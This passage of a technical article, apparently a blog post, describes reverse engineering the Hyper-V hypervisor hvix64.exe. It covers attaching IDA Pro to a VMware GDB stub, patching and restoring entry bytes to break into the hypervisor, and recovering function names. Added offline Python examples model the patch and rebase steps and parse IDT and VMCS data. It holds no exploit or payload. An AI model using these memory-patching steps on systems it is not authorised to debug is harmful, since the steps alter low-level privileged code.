transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, for example).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The old IDAPython scripts were modified to simplify debugging. 
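</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The patch, rebase and restore steps those scripts perform, as an added example that is not part of the original article or the author's IDAPython scripts: a pure-Python model run against a constructed PE image, so it works offline without IDA or the VMware GDB stub. It assumes (the page does not say) that the patch is a jmp $ self-loop (EB FE) and that the register used for the jump into the hypervisor (rdx above) holds hvix64.exe's PE entry point, so the new image base is that value minus AddressOfEntryPoint.</span></p>

```python
import struct

# Manual memory region from the article: where hvix64.exe lives after `mov cr3, rcx`.
MANUAL_REGION_START = 0xFFFFFB0000000000
MANUAL_REGION_END = 0xFFFFFCFFFFFFFFFF
# Assumed patch (not stated on the page): a `jmp $` self-loop (EB FE) planted on the
# hypervisor's first instruction, so the guest spins there until IDA is re-attached.
SPIN_LOOP = b"\xEB\xFE"
# Constructed stand-in for the first bytes at the hypervisor entry (mov [rsp+8], rbx).
ENTRY_CODE = b"\x48\x89\x5C\x24\x08"

def in_manual_region(addr: int) -> bool:
    """Jump target must lie in a configured manual region, or IDA PRO hangs on the jump."""
    return MANUAL_REGION_START <= addr <= MANUAL_REGION_END

def pe32plus_optional_header(pe: bytes) -> int:
    """Offset of the PE32+ optional header, after validating the MZ/PE signatures."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20  # PE signature + COFF file header
    if struct.unpack_from("<H", pe, opt)[0] != 0x20B:
        raise ValueError("expected PE32+ (hvix64.exe is a 64-bit image)")
    return opt

def entry_point_rva(pe: bytes) -> int:
    """AddressOfEntryPoint sits 16 bytes into the optional header."""
    return struct.unpack_from("<I", pe, pe32plus_optional_header(pe) + 16)[0]

def preferred_image_base(pe: bytes) -> int:
    """ImageBase (8 bytes in PE32+) sits 24 bytes in; IDA keeps the database there until rebased."""
    return struct.unpack_from("<Q", pe, pe32plus_optional_header(pe) + 24)[0]

def rebase_delta(jmp_target: int, pe: bytes):
    """Step 4 (RebaseHVGdb): runtime base = jump target - AddressOfEntryPoint (assumption);
    the delta is what must be added to every address in the IDA database."""
    if not in_manual_region(jmp_target):
        raise ValueError("jump target outside the manual memory regions (IDA would hang)")
    new_base = jmp_target - entry_point_rva(pe)
    return new_base, new_base - preferred_image_base(pe)

class TargetMemory:
    """Constructed stand-in for guest memory reached through the VMware GDB stub."""
    def __init__(self, base: int, image: bytes):
        self.base, self.mem = base, bytearray(image)

    def read(self, addr: int, size: int) -> bytes:
        off = addr - self.base
        if off < 0 or off + size > len(self.mem):
            raise ValueError("address outside the mapped image")
        return bytes(self.mem[off:off + size])

    def write(self, addr: int, data: bytes) -> None:
        self.read(addr, len(data))  # bounds check only
        self.mem[addr - self.base:addr - self.base + len(data)] = data

def patch_entry(mem: TargetMemory, addr: int, saved: dict) -> bytes:
    """Step 3 (PatchHvix64): remember the original bytes, then plant the spin loop."""
    if addr in saved:
        raise RuntimeError("entry already patched")
    saved[addr] = mem.read(addr, len(SPIN_LOOP))
    mem.write(addr, SPIN_LOOP)
    return saved[addr]

def restore_entry(mem: TargetMemory, addr: int, saved: dict) -> bytes:
    """Step 5 (RestoreHvix64): put the replaced instruction bytes back."""
    original = saved.pop(addr)
    mem.write(addr, original)
    return original

def build_min_pe(entry_rva: int, image_base: int, entry_code: bytes) -> bytes:
    """Constructed minimal PE32+ image (headers + entry code, no sections); offsets == RVAs."""
    img = bytearray(entry_rva + len(entry_code))
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)            # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", img, 0x44, 0x8664, 0)       # Machine = AMD64, no sections
    struct.pack_into("<H", img, 0x54, 240)              # SizeOfOptionalHeader (PE32+)
    struct.pack_into("<H", img, 0x58, 0x20B)            # PE32+ magic
    struct.pack_into("<I", img, 0x58 + 16, entry_rva)   # AddressOfEntryPoint
    struct.pack_into("<Q", img, 0x58 + 24, image_base)  # ImageBase
    img[entry_rva:entry_rva + len(entry_code)] = entry_code
    return bytes(img)

def demo(rdx: int = 0xFFFFFB0000001000) -> dict:
    """Run steps 3-5 end to end on constructed data (the rdx value is constructed too)."""
    pe = build_min_pe(0x1000, 0x140000000, ENTRY_CODE)  # constructed preferred base
    new_base, delta = rebase_delta(rdx, pe)
    mem, saved = TargetMemory(new_base, pe), {}
    patch_entry(mem, rdx, saved)
    patched = mem.read(rdx, len(SPIN_LOOP))
    restore_entry(mem, rdx, saved)
    return {"base": new_base, "delta": delta, "patched": patched,
            "restored": mem.read(rdx, len(ENTRY_CODE))}
```

<p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The constructed values (the register value, preferred image base and entry bytes) stand in for what you would read from the GDB stub and the IDA database; the real scripts act on the live database instead of a byte buffer.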
</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1_PatchHvLoader2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2_RestoreHvLoader2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3_PatchHvix64_2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4_RebaseHVGdb2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5_RestoreHvix64_2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span 
face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Shortly, if you want debug hvix64.exe module using GDB, you need:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">start VMware in GDB debugging mode – you stopped on BIOS initialization block</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: 
baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">attach IDA PRO with winload.efi to GDB and make breakpoint to instruction, which make calling of hvloader!HvlLaunchHypervisor </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">press F9</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span 
face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run 1_PatchHvLoader2019.py through IDA.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">detach IDA PRO with winload.efi and attach IDA PRO with hvloader.dll</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; 
font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run 2_RestoreHvLoader2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">make breakpoint on instruction, that jump inside hypervisor (jmp r8)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run 3_PatchHvix64_2019.py</span></p><p 
dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">detach IDA PRO with hvloader.dll and attach IDA PRO with hvix64.exe</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run 4_RebaseHVGdb2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: 
-18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run 5_RestoreHvix64_2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After that you can debug hvix64.exe starting from the start+0x7A offset.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Note that the hypervisor loading process in Windows Server 2012 (and later) differs significantly from Windows Server 2008 R2, where the hypervisor was prepared and launched directly by hvboot.sys, which runs after the Windows kernel has loaded. There the hypervisor was activated with the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmlaunch</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> instruction executed in hvboot.sys, and the next VM exit was then handled by hvix64.exe.</span></p><h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 12pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Find symbolic information</span></h1><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; 
font-weight: 400; text-decoration: none; vertical-align: baseline;">Many Hyper-V components have had public symbols since 2018. At the time of publication only hvix64.exe, hvax64.exe and hvaa64.exe, together with hvloader.dll, have no symbols. The latest hvloader.exe\efi and hvloader.dll symbols can be loaded for modules compiled before 03.2018 (I used hvloader.dll symbols from Windows 10, build 17115, build date 03.03.2018).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When hvix64.exe is loaded in IDA PRO we get about four thousand functions with names like sub_FFFFF8000XXXXX, because Microsoft unfortunately does not provide symbol information for the hypervisor. To make researching the hypervisor easier, we can first try to identify some of the functions without studying them in detail.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First of all it is worth using bindiff (or diaphora) to compare hvix64 with hvloader and winload, for which symbol information is provided. The comparison shows that the networking (e1000), USB, cryptography and some other functions are exactly the same as those present in winload.exe (in Windows Server 2019 and Windows 10 the Hyper-V debugging and network driver functions have been moved to separate modules, e.g. bootlib.dll). This helps determine the purpose of 500 functions. 
The same bindiff allows you to move the names of matching functions from one idb database to another. However, this method should be used with caution: do not move all fully matched functions blindly; at the very least, check the result in the visual graph comparison of matched functions (Ctrl + E).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, let's identify the exception/interrupt handlers, which are standard for the x86 processor architecture. A small Python script (ParseIDT.py) parses the IDT; it must be run in IDA PRO while connected to the hypervisor through the WinDBG debugging module.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If an ISR is not found, check the List of problems tab in IDA PRO, since IDA's automatic analysis may fail to recognize these procedures as code.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, you can identify the VM exit handler after reading the VMCS field values. 
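</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The IDT walk that the ParseIDT.py step above relies on can be shown offline. The following is an added example written for this edition, not the article's script: it decodes 64-bit IDT gate descriptors (Intel SDM layout) from a constructed byte image and lists the handler address, gate type and IST index of every present vector, then flags any handler that does not point into a given module range. The gate contents, addresses and function names are made up; inside IDA the same bytes would be read from the debuggee at the IDTR base, and the resulting addresses are where the ISR functions should be created.</span></p>

```python
"""Parse an x86-64 IDT image and list the interrupt handler addresses.

Added example, not the ParseIDT.py script from the article. The 16-byte gate
layout follows the Intel SDM, vol. 3, "64-Bit IDT Gate Descriptors". The IDT
bytes below are constructed; inside IDA the same bytes would be read from the
debuggee at the IDTR base (for example with ida_idd.dbg_read_memory).
"""
from dataclasses import dataclass

GATE_SIZE = 16  # every IDT entry in 64-bit mode is 16 bytes


@dataclass
class IdtGate:
    vector: int
    handler: int      # 64-bit linear address of the ISR
    selector: int     # code segment selector loaded on entry
    ist: int          # Interrupt Stack Table index, 0 = no stack switch via IST
    gate_type: int    # 0xE = interrupt gate, 0xF = trap gate
    dpl: int
    present: bool


def parse_gate(vector: int, raw: bytes) -> IdtGate:
    """Decode one 16-byte gate descriptor."""
    if len(raw) != GATE_SIZE:
        raise ValueError("gate descriptor must be 16 bytes")
    off_low = int.from_bytes(raw[0:2], "little")
    selector = int.from_bytes(raw[2:4], "little")
    ist = raw[4] & 0x7
    attrs = raw[5]
    off_mid = int.from_bytes(raw[6:8], "little")
    off_high = int.from_bytes(raw[8:12], "little")  # bytes 12..15 are reserved
    handler = off_low | (off_mid << 16) | (off_high << 32)
    return IdtGate(vector, handler, selector, ist,
                   attrs & 0xF, (attrs >> 5) & 0x3, bool(attrs & 0x80))


def parse_idt(image: bytes, limit: int) -> list:
    """Return the present gates within IDTR.limit (limit is inclusive, as in IDTR)."""
    count = (limit + 1) // GATE_SIZE
    gates = []
    for vec in range(count):
        gate = parse_gate(vec, image[vec * GATE_SIZE:(vec + 1) * GATE_SIZE])
        if gate.present:
            gates.append(gate)
    return gates


def handlers_outside_image(gates: list, image_base: int, image_size: int) -> list:
    """Vectors whose handler does not point into [image_base, image_base + image_size)."""
    return [g.vector for g in gates
            if not image_base <= g.handler < image_base + image_size]


def build_gate(handler: int, selector: int = 0x10, ist: int = 0,
               gate_type: int = 0xE, dpl: int = 0, present: bool = True) -> bytes:
    """Encode a gate; used only to build the constructed sample IDT below."""
    attrs = (gate_type & 0xF) | ((dpl & 0x3) << 5) | (0x80 if present else 0)
    return ((handler & 0xFFFF).to_bytes(2, "little")
            + selector.to_bytes(2, "little")
            + bytes([ist & 0x7, attrs])
            + ((handler >> 16) & 0xFFFF).to_bytes(2, "little")
            + ((handler >> 32) & 0xFFFFFFFF).to_bytes(4, "little")
            + bytes(4))


# Constructed sample: vectors 0-2 present at made-up hypervisor-like addresses,
# vector 2 (NMI) on IST 1, vector 3 marked not present.
SAMPLE_IDT = (build_gate(0xFFFFF80000401000)
              + build_gate(0xFFFFF80000401100, gate_type=0xF)
              + build_gate(0xFFFFF80000401200, ist=1)
              + build_gate(0, present=False))
SAMPLE_LIMIT = len(SAMPLE_IDT) - 1


def handler_map(image: bytes = SAMPLE_IDT, limit: int = SAMPLE_LIMIT) -> dict:
    """vector -> handler address for every present gate."""
    return {g.vector: g.handler for g in parse_idt(image, limit)}


if __name__ == "__main__":
    for g in parse_idt(SAMPLE_IDT, SAMPLE_LIMIT):
        kind = "trap" if g.gate_type == 0xF else "intr"
        print(f"vector {g.vector:3d}: {kind} gate, handler 0x{g.handler:016X}, ist={g.ist}, dpl={g.dpl}")
```

<p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run as a script it prints one line per present vector. The range check is the sanity step to apply before naming functions from the result: a handler outside the hvix64.exe image, or a non-present gate, should not be turned into an ISR function in the database.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">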
This can be done after the procedure that fills the VMCS in hvix64.exe has run, or by using the script display-vmcs.py, which reads all VMCS fields in the context of the hypervisor and prints their values.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are good IDA Python scripts from Behrooz Abbassi (@rceninja): ia32_msr_decoder.py and IA32_VMX_Helper.py. You can apply them to get symbolic MSR and VMCS field names inside the IDA database.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The good news is that hypervisor symbols for hvix64.exe, hvax64.exe and hvboot.sys from Windows Server 2008 are available. The bad news is that Windows Server 2008 is no longer updated and lacks many of the new Hyper-V features. 
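</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The encodings that display-vmcs.py reads and that IA32_VMX_Helper.py turns into symbolic names follow a fixed Intel layout, so the decoding can be shown without a running hypervisor. The following added example (mine, not the scripts named above) splits a VMCS field encoding into its index, type and width, attaches a name for a handful of well-known fields, and, on a constructed list of vmread sites, picks out the function that reads VM_EXIT_REASON, which is how the VM exit handler mentioned above is usually located. The function names in the sample are invented; the field table is a small subset of the SDM's.</span></p>

```python
"""Decode Intel VMX VMCS field encodings, the immediates used by vmread/vmwrite.

Added example; not the display-vmcs.py or IA32_VMX_Helper.py scripts named in
the article.  Layout from the Intel SDM vol. 3 ("VMCS Field Encoding"):
bit 0 = access type (1 selects the high half of a 64-bit field), bits 9:1 =
index, bits 11:10 = field type, bit 12 reserved, bits 14:13 = width, bits 31:15
reserved.  The sample vmread list and its function names are constructed.
"""

FIELD_TYPES = {0: "control", 1: "vm-exit information", 2: "guest state", 3: "host state"}
WIDTHS = {0: "16-bit", 1: "64-bit", 2: "32-bit", 3: "natural-width"}

# A few well-known encodings (SDM Appendix B), enough to label the sample below.
KNOWN_FIELDS = {
    0x0000: "VIRTUAL_PROCESSOR_ID",
    0x0800: "GUEST_ES_SELECTOR",
    0x0C00: "HOST_ES_SELECTOR",
    0x2000: "IO_BITMAP_A",
    0x201A: "EPT_POINTER",
    0x2800: "VMCS_LINK_POINTER",
    0x4000: "PIN_BASED_VM_EXEC_CONTROL",
    0x4400: "VM_INSTRUCTION_ERROR",
    0x4402: "VM_EXIT_REASON",
    0x6800: "GUEST_CR0",
    0x681E: "GUEST_RIP",
    0x6C16: "HOST_RIP",
}

VM_EXIT_REASON = 0x4402


def is_valid_encoding(enc: int) -> bool:
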